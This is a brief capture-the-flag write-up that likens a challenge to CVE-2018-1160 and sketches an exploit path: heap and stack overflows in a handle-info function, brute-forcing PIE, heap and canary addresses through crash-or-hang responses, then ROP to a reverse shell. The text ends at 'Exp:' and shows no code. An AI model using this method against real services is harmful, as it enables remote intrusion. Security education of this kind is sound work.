Rating:
The solution is similar to CVE-2018-1160, Metatalk in Hitcon 2021.
1.Read the source code and find the vulnerability.
2.I find two vulnerabilities one Heap-Overflow and one Stack-Overflowin function handle-info
3.The heap-overflow is hard to use, cuz we need to construct the heap Fengshui carefully.
4.While the Stack-Overflow one is easy to use, we could get the addresses of pie/heap/canary by judging the statement of connection (crash or hang).
5.ROP to get a reversed shell Exp:
